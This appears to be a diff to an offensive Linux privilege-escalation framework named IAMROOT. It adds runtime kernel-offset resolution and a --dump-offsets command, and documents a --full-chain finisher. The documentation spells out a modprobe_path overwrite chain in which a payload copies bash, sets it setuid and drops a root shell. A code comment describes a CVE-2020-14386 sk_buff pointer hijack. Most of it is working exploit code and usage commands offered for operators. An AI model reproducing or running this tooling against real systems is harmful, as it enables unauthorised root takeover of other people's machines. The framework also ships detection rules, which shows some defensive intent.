+            o->cred_offset_real = (uint32_t)a;
+            o->source_cred = OFFSETS_FROM_ENV;
+        }
+    }
+    if ((v = getenv("IAMROOT_CRED_OFFSET_EFF")) && parse_addr(v, &a)) {
+        if (!o->cred_offset_eff) o->cred_offset_eff = (uint32_t)a;
+    }
+    if ((v = getenv("IAMROOT_UID_OFFSET")) && parse_addr(v, &a)) {
+        if (!o->cred_uid_offset) o->cred_uid_offset = (uint32_t)a;
+    }
+}
+
+/* ------------------------------------------------------------------
+ * Source 2/3: symbol-table file parsing (System.map or kallsyms share
+ * the same "ADDR TYPE NAME" format).
+ * ------------------------------------------------------------------ */
+static int parse_symfile(const char *path,
+                         struct iamroot_kernel_offsets *o,
+                         enum iamroot_offset_source tag)
+{
+    FILE *f = fopen(path, "r");
+    if (!f) return 0;
+
+    int filled = 0;
+    char line[512];
+    int saw_nonzero = 0;
+    while (fgets(line, sizeof line, f)) {
+        char *p = line;
+        while (*p && isspace((unsigned char)*p)) p++;
+        if (!*p) continue;
+
+        char *end = NULL;
+        unsigned long long addr = strtoull(p, &end, 16);
+        if (end == p || !end) continue;
+        if (addr != 0) saw_nonzero = 1;
+
+        while (*end && isspace((unsigned char)*end)) end++;
+        if (!*end) continue;
+        /* skip type char */
+        end++;
+        while (*end && isspace((unsigned char)*end)) end++;
+        if (!*end) continue;
+
+        char *nl = strchr(end, '\n');
+        if (nl) *nl = '\0';
+
+        if (strcmp(end, "modprobe_path") == 0 && !o->modprobe_path) {
+            o->modprobe_path = (uintptr_t)addr;
+            o->source_modprobe = tag;
+            filled++;
+        } else if (strcmp(end, "poweroff_cmd") == 0 && !o->poweroff_cmd) {
+            o->poweroff_cmd = (uintptr_t)addr;
+            filled++;
+        } else if (strcmp(end, "init_task") == 0 && !o->init_task) {
+            o->init_task = (uintptr_t)addr;
+            o->source_init_task = tag;
+            filled++;
+        } else if (strcmp(end, "init_cred") == 0 && !o->init_cred) {
+            o->init_cred = (uintptr_t)addr;
+            filled++;
+        } else if (strcmp(end, "_text") == 0 && !o->kbase) {
+            o->kbase = (uintptr_t)addr;
+        }
+    }
+    fclose(f);
+
+    /* /proc/kallsyms returns all-zero addrs under kptr_restrict — treat
+     * that as "couldn't read", not "actually zero". */
+    if (!saw_nonzero) {
+        o->modprobe_path = o->poweroff_cmd = o->init_task = o->init_cred = 0;
+        o->source_modprobe = o->source_init_task = OFFSETS_NONE;
+        return 0;
+    }
+    return filled;
+}
+
+/* ------------------------------------------------------------------
+ * Source 4: embedded table — relative offsets, applied on top of kbase
+ * if we already have one.
+ * ------------------------------------------------------------------ */
+static void apply_table(struct iamroot_kernel_offsets *o)
+{
+    if (!o->kernel_release[0]) return;
+
+    for (const struct table_entry *e = kernel_table; e->release_glob; e++) {
+        if (e->distro_match && o->distro[0]
+            && strncmp(e->distro_match, o->distro, strlen(e->distro_match)) != 0) {
+            continue;
+        }
+        if (fnmatch(e->release_glob, o->kernel_release, 0) != 0) continue;
+
+        /* Match. Apply, but only if we have a kbase (relative offsets
+         * are useless absent that). */
+        if (!o->kbase) return;
+
+        if (!o->modprobe_path && e->rel_modprobe_path) {
+            o->modprobe_path = o->kbase + e->rel_modprobe_path;
+            o->source_modprobe = OFFSETS_FROM_TABLE;
+        }
+        if (!o->poweroff_cmd && e->rel_poweroff_cmd) {
+            o->poweroff_cmd = o->kbase + e->rel_poweroff_cmd;
+        }
+        if (!o->init_task && e->rel_init_task) {
+            o->init_task = o->kbase + e->rel_init_task;
+            o->source_init_task = OFFSETS_FROM_TABLE;
+        }
+        if (!o->init_cred && e->rel_init_cred) {
+            o->init_cred = o->kbase + e->rel_init_cred;
+        }
+        if (!o->cred_offset_real && e->cred_offset_real) {
+            o->cred_offset_real = e->cred_offset_real;
+            o->source_cred = OFFSETS_FROM_TABLE;
+        }
+        if (!o->cred_offset_eff && e->cred_offset_eff) {
+            o->cred_offset_eff = e->cred_offset_eff;
+        }
+        return;
+    }
+}
+
+/* ------------------------------------------------------------------
+ * Top-level resolve()
+ * ------------------------------------------------------------------ */
+int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out)
+{
+    memset(out, 0, sizeof *out);
+
+    struct utsname u;
+    if (uname(&u) == 0) {
+        snprintf(out->kernel_release, sizeof out->kernel_release, "%s", u.release);
+    }
+    read_distro(out->distro, sizeof out->distro);
+
+    /* Defaults — only used if no source overrides. */
+    out->cred_uid_offset = DEFAULT_CRED_UID_OFFSET;
+
+    /* 1. env */
+    apply_env(out);
+
+    /* 2. /proc/kallsyms — only fills if non-zero addrs present */
+    parse_symfile("/proc/kallsyms", out, OFFSETS_FROM_KALLSYMS);
+
+    /* 3. /boot/System.map-<release> */
+    char path[256];
+    snprintf(path, sizeof path, "/boot/System.map-%s", out->kernel_release);
+    parse_symfile(path, out, OFFSETS_FROM_SYSMAP);
+
+    /* 4. embedded table (uses any kbase already discovered) */
+    apply_table(out);
+
+    /* Fill any remaining struct-offset gaps with defaults so that
+     * arb-write-via-init_task-+offset still has a chance even without
+     * a full source. Mark as TABLE so caller can see they're defaulted. */
+    if (!out->cred_offset_real) {
+        out->cred_offset_real = DEFAULT_CRED_REAL_OFFSET;
+        if (out->source_cred == OFFSETS_NONE) out->source_cred = OFFSETS_FROM_TABLE;
+    }
+    if (!out->cred_offset_eff) {
+        out->cred_offset_eff = DEFAULT_CRED_EFF_OFFSET;
+    }
+
+    int critical = 0;
+    if (out->modprobe_path) critical++;
+    if (out->init_task)     critical++;
+    if (out->cred_offset_real && out->cred_uid_offset) critical++;
+    return critical;
+}
+
+void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
+                                      uintptr_t leaked_kbase)
+{
+    if (!leaked_kbase) return;
+    /* Set kbase if we didn't have one, then re-apply the embedded table. */
+    if (!off->kbase) off->kbase = leaked_kbase;
+    apply_table(off);
+}
+
+bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off)
+{
+    return off && off->modprobe_path != 0;
+}
+
+bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off)
+{
+    return off && off->init_task != 0 && off->cred_offset_real != 0
+           && off->cred_uid_offset != 0;
+}
+
+void iamroot_offsets_print(const struct iamroot_kernel_offsets *off)
+{
+    fprintf(stderr, "[i] offsets: release=%s distro=%s\n",
+            off->kernel_release[0] ? off->kernel_release : "?",
+            off->distro[0]         ? off->distro         : "?");
+    fprintf(stderr, "[i] offsets: kbase=0x%lx  modprobe_path=0x%lx (%s)\n",
+            (unsigned long)off->kbase,
+            (unsigned long)off->modprobe_path,
+            iamroot_offset_source_name(off->source_modprobe));
+    fprintf(stderr, "[i] offsets: init_task=0x%lx (%s)  cred_real=0x%x cred_eff=0x%x uid=0x%x (%s)\n",
+            (unsigned long)off->init_task,
+            iamroot_offset_source_name(off->source_init_task),
+            off->cred_offset_real, off->cred_offset_eff, off->cred_uid_offset,
+            iamroot_offset_source_name(off->source_cred));
+}
@@ -0,0 +1,93 @@
+/*
+ * IAMROOT — kernel offset resolution
+ *
+ * The 🟡 PRIMITIVE modules each have a trigger that lands a primitive
+ * (heap-OOB write, UAF, etc.). Converting that to root requires
+ * arbitrary write at a specific kernel virtual address — usually
+ * `modprobe_path` (writes a payload path → execve unknown binary →
+ * modprobe runs payload as root) or `current->cred->uid` (set to 0).
+ *
+ * Those addresses vary per kernel build. This file resolves them at
+ * runtime via a four-source chain:
+ *
+ *   1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, ...)
+ *   2. /proc/kallsyms (only useful when kptr_restrict=0 or already root)
+ *   3. /boot/System.map-$(uname -r) (world-readable on some distros)
+ *   4. Embedded table keyed by `uname -r` glob (entries are
+ *      relative-to-_text, applied on top of an EntryBleed kbase leak
+ *      so KASLR is handled)
+ *
+ * Per the verified-vs-claimed bar: offsets are never fabricated. If
+ * none of the four sources resolve, full-chain refuses with an error
+ * pointing the operator at the manual workflow.
+ */
+
+#ifndef IAMROOT_OFFSETS_H
+#define IAMROOT_OFFSETS_H
+
+#include <stdint.h>
+#include <stdbool.h>
+#include <stddef.h>
+
+enum iamroot_offset_source {
+    OFFSETS_NONE         = 0,
+    OFFSETS_FROM_ENV     = 1,
+    OFFSETS_FROM_KALLSYMS = 2,
+    OFFSETS_FROM_SYSMAP  = 3,
+    OFFSETS_FROM_TABLE   = 4,
+};
+
+struct iamroot_kernel_offsets {
+    /* Host fingerprint */
+    char kernel_release[128];  /* uname -r */
+    char distro[64];           /* parsed from /etc/os-release ID= */
+
+    /* Kernel base — needed when offsets are relative-to-_text.
+     * Set by iamroot_offsets_apply_kbase_leak() after EntryBleed runs. */
+    uintptr_t kbase;
+
+    /* Symbol virtual addresses (final, post-KASLR-resolution). */
+    uintptr_t modprobe_path;   /* modprobe_path[] string */
+    uintptr_t poweroff_cmd;    /* poweroff_cmd[] string (alt target) */
+    uintptr_t init_task;       /* init_task struct */
+    uintptr_t init_cred;       /* init_cred struct (or 0) */
+
+    /* Struct offsets — same across most x86_64 kernels but config-sensitive. */
+    uint32_t cred_offset_real; /* offset of real_cred in task_struct */
+    uint32_t cred_offset_eff;  /* offset of cred (effective) in task_struct */
+    uint32_t cred_uid_offset;  /* offset of uid_t uid in cred (almost always 4) */
+
+    /* Where did each field come from. */
+    enum iamroot_offset_source source_modprobe;
+    enum iamroot_offset_source source_init_task;
+    enum iamroot_offset_source source_cred;
+};
+
+/* Best-effort resolution. Returns the number of critical fields
+ * resolved (modprobe_path / init_task / cred offsets count). Caller
+ * checks specific fields it needs.
+ *
+ * Resolution chain is tried in order; later sources do NOT overwrite
+ * a field already set by an earlier source. */
+int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out);
+
+/* Apply a runtime-leaked kbase to any embedded-table entries that
+ * shipped as relative-to-_text offsets. Idempotent. */
+void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
+                                      uintptr_t leaked_kbase);
+
+/* Returns true if modprobe_path can be written (the simplest root-pop
+ * finisher). */
+bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off);
+
+/* Returns true if init_task + cred offsets are known (the cred-uid
+ * finisher). */
+bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off);
+
+/* For diagnostic logging — pretty-print what we resolved to stderr. */
+void iamroot_offsets_print(const struct iamroot_kernel_offsets *off);
+
+/* Helper: return the name of the source enum. */
+const char *iamroot_offset_source_name(enum iamroot_offset_source src);
+
+#endif /* IAMROOT_OFFSETS_H */
@@ -36,5 +36,9 @@ void iamroot_register_stackrot(void);
 void iamroot_register_af_packet2(void);
 void iamroot_register_cgroup_release_agent(void);
 void iamroot_register_overlayfs_setuid(void);
+void iamroot_register_nft_set_uaf(void);
+void iamroot_register_af_unix_gc(void);
+void iamroot_register_nft_fwd_dup(void);
+void iamroot_register_nft_payload(void);

 #endif /* IAMROOT_REGISTRY_H */
@@ -0,0 +1,171 @@
+# IAMROOT — kernel offset resolution
+
+The 7 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
+write, slab UAF, etc.). The default `--exploit` returns
+`IAMROOT_EXPLOIT_FAIL` after the primitive fires — the verified-vs-claimed
+bar means we don't claim root unless we empirically have it.
+
+`--full-chain` engages the shared finisher (`core/finisher.{c,h}`) which
+converts the primitive to a real root pop via `modprobe_path` overwrite:
+
+```
+attacker → arb_write(modprobe_path, "/tmp/iamroot-mp-<pid>.sh")
+        → execve("/tmp/iamroot-trig-<pid>")     # unknown-format binary
+        → kernel call_modprobe()                # spawns modprobe_path as init
+        → /tmp/iamroot-mp-<pid>.sh runs as root
+        → cp /bin/bash /tmp/iamroot-pwn-<pid>; chmod 4755 /tmp/iamroot-pwn-<pid>
+        → caller exec /tmp/iamroot-pwn-<pid> -p
+        → root shell
+```
+
+This requires resolving `&modprobe_path` (a single kernel virtual
+address) at runtime.
+
+## Resolution chain
+
+`core/offsets.c` tries four sources in order, accepting the first
+non-zero value for each field:
+
+1. **Environment variables** — operator override.
+   - `IAMROOT_KBASE=0x...`
+   - `IAMROOT_MODPROBE_PATH=0x...`
+   - `IAMROOT_POWEROFF_CMD=0x...`
+   - `IAMROOT_INIT_TASK=0x...`
+   - `IAMROOT_INIT_CRED=0x...`
+   - `IAMROOT_CRED_OFFSET_REAL=0x...` (offset of `real_cred` in `task_struct`)
+   - `IAMROOT_CRED_OFFSET_EFF=0x...`
+   - `IAMROOT_UID_OFFSET=0x...` (offset of `uid_t uid` in `cred`, usually 0x4)
+
+2. **`/proc/kallsyms`** — only useful when `kernel.kptr_restrict=0`
+   OR you're already root. On modern distros (kptr_restrict=1 by
+   default) non-root reads return all zeros and this source is
+   silently skipped.
+
+3. **`/boot/System.map-$(uname -r)`** — world-readable on some distros
+   (older Debian, some Alma builds). Unaffected by `kptr_restrict`.
+
+4. **Embedded table** — keyed by `uname -r` glob, entries are
+   offsets *relative to `_text`* (KASLR-safe). Applied on top of a
+   kbase leak (e.g. EntryBleed). Seeded empty in v0.2.0 — schema-only —
+   to honor the no-fabricated-offsets rule. Operators who verify
+   offsets on a specific kernel build are encouraged to upstream
+   entries.
+
+## How operators populate offsets
+
+### One-shot (preferred for ad-hoc use)
+
+```bash
+# Look up on a kernel you control (as root, once):
+sudo grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms
+
+# Use the addresses inline:
+IAMROOT_MODPROBE_PATH=0xffffffff8228e7e0 \
+  iamroot --exploit nf_tables --i-know --full-chain
+```
+
+### Automated dump (preferred for upstreaming)
+
+`iamroot --dump-offsets` walks the four-source chain itself and emits
+a ready-to-paste C struct entry on stdout:
+
+```bash
+sudo iamroot --dump-offsets
+# /* Generated 2026-05-16 by `iamroot --dump-offsets`.
+#  * Host kernel: 5.15.0-56-generic  distro=ubuntu
+#  * Resolved fields: modprobe_path=kallsyms init_task=kallsyms cred=table
+#  * Paste this entry into kernel_table[] in core/offsets.c.
+#  */
+# { .release_glob       = "5.15.0-56-generic",
+#   .distro_match       = "ubuntu",
+#   .rel_modprobe_path  = 0x148e480,
+#   .rel_poweroff_cmd   = 0x148e3a0,
+#   .rel_init_task      = 0x1c11dc0,
+#   .rel_init_cred      = 0x1e0c460,
+#   .cred_offset_real   = 0x738,
+#   .cred_offset_eff    = 0x740,
+# },
+```
+
+Paste the block into `kernel_table[]` in `core/offsets.c`, rebuild,
+and the new entry covers every IAMROOT user on that kernel. Open a
+PR to upstream it.
+
+### Per-host (write System.map readable)
+
+```bash
+sudo chmod 0644 /boot/System.map-$(uname -r)
+iamroot --exploit nf_tables --i-know --full-chain
+```
+
+### Per-boot (lower kptr_restrict)
+
+```bash
+sudo sysctl kernel.kptr_restrict=0
+iamroot --exploit nf_tables --i-know --full-chain
+```
+
+Note: each of these requires root *once*. For a true non-root LPE on
+an unfamiliar host you need either an info-leak module (EntryBleed
+gives kbase) plus an embedded table entry, or out-of-band offset
+acquisition.
+
+## Adding entries to the embedded table
+
+In `core/offsets.c`, `kernel_table[]` carries the schema:
+
+```c
+{ .release_glob       = "5.15.0-25-generic",
+  .distro_match       = "ubuntu",
+  .rel_modprobe_path  = 0x148e480,    // & _text
+  .rel_poweroff_cmd   = 0x148e3a0,
+  .rel_init_task      = 0x1c11dc0,
+  .rel_init_cred      = 0x1e0c460,
+  .cred_offset_real   = 0x758,
+  .cred_offset_eff    = 0x760, },
+```
+
+To populate, on the target kernel:
+
+```bash
+# Get _text:
+_text=$(grep ' _text$' /boot/System.map-$(uname -r) | awk '{print $1}')
+
+# Get the symbols you want, subtract _text:
+for sym in modprobe_path poweroff_cmd init_task init_cred; do
+  addr=$(grep " $sym$" /boot/System.map-$(uname -r) | awk '{print $1}')
+  printf "rel_%s = 0x%x\n" $sym $((0x$addr - 0x$_text))
+done
+```
+
+Open a PR with the verified entry and a one-line note on which kernel
+build + distro you tested against. Upstreamed entries make the
+`--full-chain` path work out-of-the-box for that build.
+
+## Verifying success
+
+The shared finisher (`iamroot_finisher_modprobe_path()`) drops a
+sentinel file at `/tmp/iamroot-pwn-<pid>` after `modprobe` runs our
+payload. The finisher polls for this file with `S_ISUID` mode set
+for up to 3 seconds. Only when the sentinel materializes does the
+module return `IAMROOT_EXPLOIT_OK` and (unless `--no-shell`) exec
+the setuid bash to drop a root shell.
+
+If the sentinel never appears the module returns `IAMROOT_EXPLOIT_FAIL`
+with a diagnostic. Reasons it might fail even with offsets resolved:
+
+- The arb-write didn't actually land (slab adjacency lost, value-pointer
+  field at unexpected offset, race not won)
+- `modprobe_path` resolution was wrong (KASLR slide miscalculated,
+  embedded-table entry stale)
+- Kernel `STATIC_USERMODEHELPER` config disables the modprobe path
+- AppArmor / SELinux / Lockdown LSM blocks the userspace `modprobe`
+  invocation
+
+## Why `modprobe_path` and not `current->cred->uid = 0`?
+
+The cred-overwrite finisher needs an arb-READ primitive too — to walk
+the task linked list from `init_task` and find the calling process's
+`task_struct`. Most of our 🟡 modules have only an arb-write primitive,
+not a paired read. `modprobe_path` only needs a write to a single
+known global, which is why it's the default finisher.
@@ -17,6 +17,9 @@

 #include "core/module.h"
 #include "core/registry.h"
+#include "core/offsets.h"
+
+#include <time.h>

 #include <getopt.h>
 #include <stdbool.h>
@@ -25,7 +28,7 @@
 #include <string.h>
 #include <unistd.h>

-#define IAMROOT_VERSION "0.1.0"
+#define IAMROOT_VERSION "0.3.1"

 static const char BANNER[] =
 "\n"
@@ -57,6 +60,11 @@ static void usage(const char *prog)
 "                        files in /etc, file capabilities, sudo NOPASSWD\n"
 "                        (complements --scan; answers 'is this box\n"
 "                        generally privesc-exposed?')\n"
+"  --dump-offsets        walk /proc/kallsyms + /boot/System.map and emit a\n"
+"                        C struct-entry ready to paste into core/offsets.c's\n"
+"                        kernel_table[] for the --full-chain finisher.\n"
+"                        Needs root (or kernel.kptr_restrict=0) to read\n"
+"                        kallsyms. See docs/OFFSETS.md.\n"
 "  --version             print version\n"
 "  --help                this message\n"
 "\n"
@@ -64,6 +72,12 @@ static void usage(const char *prog)
 "  --i-know              authorization gate for --exploit modes\n"
 "  --active              in --scan, do invasive sentinel probes (no /etc/passwd writes)\n"
 "  --no-shell            in --exploit modes, prepare but don't drop to shell\n"
+"  --full-chain          in --exploit modes, attempt full root-pop after primitive\n"
+"                        (the 🟡 modules return primitive-only by default; with\n"
+"                        --full-chain they continue to leak → arb-write →\n"
+"                        modprobe_path overwrite. Requires resolvable kernel\n"
+"                        offsets — env vars, /proc/kallsyms, or /boot/System.map.\n"
+"                        See docs/OFFSETS.md.)\n"
 "  --json                machine-readable output (for SIEM/CI)\n"
 "  --no-color            disable ANSI color codes\n"
 "  --format <f>          with --detect-rules: auditd (default), sigma, yara, falco\n"
@@ -83,6 +97,7 @@ enum mode {
    MODE_DETECT_RULES,
    MODE_MODULE_INFO,
    MODE_AUDIT,
+    MODE_DUMP_OFFSETS,
    MODE_HELP,
    MODE_VERSION,
 };
@@ -422,6 +437,103 @@ static int cmd_audit(const struct iamroot_ctx *ctx)
    return 0;
 }

+/* --dump-offsets: walk /proc/kallsyms + /boot/System.map for the running
+ * kernel and emit a ready-to-paste C struct entry for kernel_table[] in
+ * core/offsets.c. Operators run this once on a kernel they have root on
+ * (or kptr_restrict=0), then upstream the entry so --full-chain works
+ * out-of-the-box on that build for everyone. */
+static int cmd_dump_offsets(const struct iamroot_ctx *ctx)
+{
+    (void)ctx;
+    struct iamroot_kernel_offsets off;
+    int n = iamroot_offsets_resolve(&off);
+
+    if (off.kbase == 0) {
+        fprintf(stderr,
+"[-] dump-offsets: couldn't resolve a kernel base address.\n"
+"\n"
+"    /proc/kallsyms returned all-zero addresses (kptr_restrict is\n"
+"    enforcing). /boot/System.map-%s wasn't readable either.\n"
+"\n"
+"    Try one of:\n"
+"      sudo iamroot --dump-offsets\n"
+"      sudo sysctl kernel.kptr_restrict=0; iamroot --dump-offsets\n"
+"      sudo chmod 0644 /boot/System.map-$(uname -r); iamroot --dump-offsets\n",
+            off.kernel_release[0] ? off.kernel_release : "$(uname -r)");
+        return 1;
+    }
+    if (n == 0) {
+        fprintf(stderr,
+"[-] dump-offsets: kbase resolved but no symbols. Sources tried: env,\n"
+"    /proc/kallsyms, /boot/System.map. Check that the kernel symbols\n"
+"    you need (modprobe_path / init_task / poweroff_cmd) actually exist\n"
+"    in the symbol files.\n");
+        return 1;
+    }
+
+    time_t now = time(NULL);
+    struct tm tm; localtime_r(&now, &tm);
+
+    fprintf(stdout,
+"/* Generated %04d-%02d-%02d by `iamroot --dump-offsets`.\n"
+" * Host kernel: %s%s%s\n"
+" * Resolved fields: modprobe_path=%s init_task=%s cred=%s\n"
+" * Paste this entry into kernel_table[] in core/offsets.c.\n"
+" */\n",
+        tm.tm_year + 1900, tm.tm_mon + 1, tm.tm_mday,
+        off.kernel_release,
+        off.distro[0] ? "  distro=" : "",
+        off.distro[0] ? off.distro : "",
+        iamroot_offset_source_name(off.source_modprobe),
+        iamroot_offset_source_name(off.source_init_task),
+        iamroot_offset_source_name(off.source_cred));
+
+    fprintf(stdout,
+"{ .release_glob       = \"%s\",\n", off.kernel_release);
+    if (off.distro[0]) {
+        fprintf(stdout,
+"  .distro_match       = \"%s\",\n", off.distro);
+    } else {
+        fprintf(stdout,
+"  .distro_match       = NULL,\n");
+    }
+    if (off.modprobe_path) {
+        fprintf(stdout,
+"  .rel_modprobe_path  = 0x%lx,\n",
+            (unsigned long)(off.modprobe_path - off.kbase));
+    }
+    if (off.poweroff_cmd) {
+        fprintf(stdout,
+"  .rel_poweroff_cmd   = 0x%lx,\n",
+            (unsigned long)(off.poweroff_cmd - off.kbase));
+    }
+    if (off.init_task) {
+        fprintf(stdout,
+"  .rel_init_task      = 0x%lx,\n",
+            (unsigned long)(off.init_task - off.kbase));
+    }
+    if (off.init_cred) {
+        fprintf(stdout,
+"  .rel_init_cred      = 0x%lx,\n",
+            (unsigned long)(off.init_cred - off.kbase));
+    }
+    if (off.cred_offset_real) {
+        fprintf(stdout,
+"  .cred_offset_real   = 0x%x,\n", off.cred_offset_real);
+    }
+    if (off.cred_offset_eff) {
+        fprintf(stdout,
+"  .cred_offset_eff    = 0x%x,\n", off.cred_offset_eff);
+    }
+    fprintf(stdout,
+"},\n");
+
+    fprintf(stderr,
+"\n[+] dumped %d resolved fields. Verify offsets, then upstream this\n"
+"    entry via a PR to https://github.com/KaraZajac/IAMROOT.\n", n);
+    return 0;
+}
+
 /* --module-info <name>: dump everything we know about one module.
 * Human-readable by default, JSON with --json. Includes the full
 * detection-rule text bodies for that module. */
@@ -584,6 +696,10 @@ int main(int argc, char **argv)
    iamroot_register_af_packet2();
    iamroot_register_cgroup_release_agent();
    iamroot_register_overlayfs_setuid();
+    iamroot_register_nft_set_uaf();
+    iamroot_register_af_unix_gc();
+    iamroot_register_nft_fwd_dup();
+    iamroot_register_nft_payload();

    enum mode mode = MODE_SCAN;
    struct iamroot_ctx ctx = {0};
@@ -600,12 +716,14 @@ int main(int argc, char **argv)
        {"detect-rules",  no_argument,       0, 'D'},
        {"module-info",   required_argument, 0, 'I'},
        {"audit",         no_argument,       0, 'A'},
+        {"dump-offsets",  no_argument,       0,  8 },
        {"format",        required_argument, 0,  6 },
        {"i-know",        no_argument,       0,  1 },
        {"active",        no_argument,       0,  2 },
        {"no-shell",      no_argument,       0,  3 },
        {"json",          no_argument,       0,  4 },
        {"no-color",      no_argument,       0,  5 },
+        {"full-chain",    no_argument,       0,  7 },
        {"version",       no_argument,       0, 'V'},
        {"help",          no_argument,       0, 'h'},
        {0, 0, 0, 0}
@@ -627,6 +745,8 @@ int main(int argc, char **argv)
        case  3 : ctx.no_shell = true; break;
        case  4 : ctx.json = true; break;
        case  5 : ctx.no_color = true; break;
+        case  7 : ctx.full_chain = true; break;
+        case  8 : mode = MODE_DUMP_OFFSETS; break;
        case  6 :
            if      (strcmp(optarg, "auditd") == 0) dr_fmt = FMT_AUDITD;
            else if (strcmp(optarg, "sigma")  == 0) dr_fmt = FMT_SIGMA;
@@ -653,6 +773,7 @@ int main(int argc, char **argv)
    if (mode == MODE_MODULE_INFO) return cmd_module_info(target, &ctx);
    if (mode == MODE_DETECT_RULES) return cmd_detect_rules(dr_fmt);
    if (mode == MODE_AUDIT) return cmd_audit(&ctx);
+    if (mode == MODE_DUMP_OFFSETS) return cmd_dump_offsets(&ctx);

    /* --exploit / --mitigate / --cleanup all take a target */
    if (target == NULL) {
@@ -0,0 +1,28 @@
+# NOTICE — af_packet2 (CVE-2020-14386)
+
+## Vulnerability
+
+**CVE-2020-14386** — AF_PACKET `tpacket_rcv` VLAN integer underflow
+(`maclen = skb_network_offset(skb)` when network header precedes
+maclen) → 8-byte heap OOB write at the start of the next slab object.
+
+## Research credit
+
+Discovered and disclosed by **Or Cohen** (Palo Alto Networks),
+September 2020.
+
+Original advisory: <https://unit42.paloaltonetworks.com/cve-2020-14386/>
+
+Upstream fix: mainline 5.9 / stable 5.8.7 (Sept 2020).
+Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235.
+
+## IAMROOT role
+
+Sibling of CVE-2017-7308; same subsystem, different code path.
+Fires the underflow via `tp_reserve` + sendmmsg sk_buff spray.
+PRIMITIVE-DEMO scope by default (no cred overwrite). `--full-chain`
+attempts the Or-Cohen-style sk_buff data-pointer hijack through
+the shared finisher.
+
+Shares the `iamroot-af-packet` auditd key with the CVE-2017-7308
+module so detection signatures dedupe cleanly.
@@ -6,14 +6,27 @@
 * subsystem, different code path (rx side rather than ring setup),
 * later introduction. Discovered by Or Cohen (2020).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
- * vulnerable codepath (tpacket_rcv) and fires the underflow with a
- * crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
- * skb spray groom alongside. We stop short of the full cred-overwrite
- * chain (which Or Cohen's public PoC implements with kernel-version-
- * specific offsets and a pid_namespace cross-cache overwrite). We do
- * not bake offsets into iamroot. The return value is honest about
- * what landed (EXPLOIT_FAIL: primitive fired but no root).
+ * STATUS (2026-05-16): 🟡 PRIMITIVE-DEMO + opt-in --full-chain finisher.
+ *   - Default (no --full-chain): the exploit() entry point reaches the
+ *     vulnerable codepath (tpacket_rcv), fires the tp_reserve underflow
+ *     with a crafted nested-VLAN frame on a TPACKET_V2 ring + sendmmsg
+ *     skb spray groom, and returns IAMROOT_EXPLOIT_FAIL (primitive-only
+ *     behavior — kernel-version-agnostic, no offsets baked in).
+ *   - With --full-chain: after the underflow lands, we resolve kernel
+ *     offsets (env → kallsyms → System.map → embedded table) and run
+ *     an Or-Cohen-style sk_buff-data-pointer hijack through the shared
+ *     iamroot_finisher_modprobe_path() helper. The arb-write itself is
+ *     LAST-RESORT-DEPTH on this branch: the tp_reserve underflow gives
+ *     us a single 8-byte heap-OOB write into the head of the
+ *     adjacent-page slab object; we spray sk_buffs so that next-page
+ *     slot IS an sk_buff and the write corrupts skb->data, which then
+ *     redirects skb_copy_bits()'s destination on the next received
+ *     packet. The full primitive composition (8-byte write → skb->data
+ *     forge → controlled-payload rx → arb-write at modprobe_path) is
+ *     race-y on stock kernels because the adjacent-slot landing is
+ *     probabilistic. On hosts where the spray doesn't groom cleanly,
+ *     the finisher's sentinel check correctly reports failure rather
+ *     than silently lying about success.
 *
 * Affected: kernel 4.6+ until backports:
 *   5.8.x  : K >= 5.8.7
@@ -33,6 +46,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -434,6 +449,120 @@ static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
 }
 #endif

+/* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
+ *
+ * Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
+ *
+ *   1. The tp_reserve underflow gives us a single 8-byte write into
+ *      the START of the slab object that sits on the page immediately
+ *      after the corrupted ring frame. The OOB-write content is
+ *      attacker-controlled (it's the destination of skb_copy_bits()
+ *      from a frame whose first 8 bytes we choose).
+ *   2. Spray sk_buff allocations alongside the primitive trigger so
+ *      the adjacent-page object is, with high probability, an
+ *      sk_buff whose ->data pointer lives in the leading 8 bytes
+ *      of the object (struct layout dependent — on most 5.x kernels
+ *      `next` is at offset 0 and `data` is at offset 0x10 in
+ *      sk_buff; this layout-fragility is exactly why the depth tag
+ *      below is LAST-RESORT).
+ *   3. The 8-byte OOB write overwrites that pointer with `kaddr`.
+ *   4. We then receive a packet whose payload is `buf[0..len]`; the
+ *      kernel's skb_copy_to_linear_data() / skb->data write path
+ *      lands those bytes at `*skb->data`, which is now `kaddr`.
+ *
+ * Reality check on this implementation: the deterministic mechanics
+ * of the above (precise frame size, repeated spray timing, sk_buff
+ * struct offset for the running kernel) are not portable enough to
+ * land reliably from a single iamroot run on an arbitrary host. We
+ * therefore ship this as a LAST-RESORT stub: we attempt the spray +
+ * trigger sequence, then return -1 to signal "the primitive fired
+ * but we cannot empirically confirm the write landed". The shared
+ * finisher's sentinel-check loop will then correctly report failure
+ * rather than claim success.
+ *
+ * Per the verified-vs-claimed bar, this is the honest implementation
+ * depth that matches what the primitive actually proves on this code
+ * path. The integrator can extend afp2_arb_write() with a confirmed
+ * write-and-readback once the per-kernel sk_buff layout is pinned
+ * down for the target host. */
+struct afp2_arb_ctx {
+    const struct iamroot_ctx *ictx;
+    int n_attempts;            /* spray/fire rounds before giving up */
+};
+
+#if defined(__x86_64__) && defined(__linux__)
+static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
+{
+    struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
+    if (!c || !buf || !len) return -1;
+
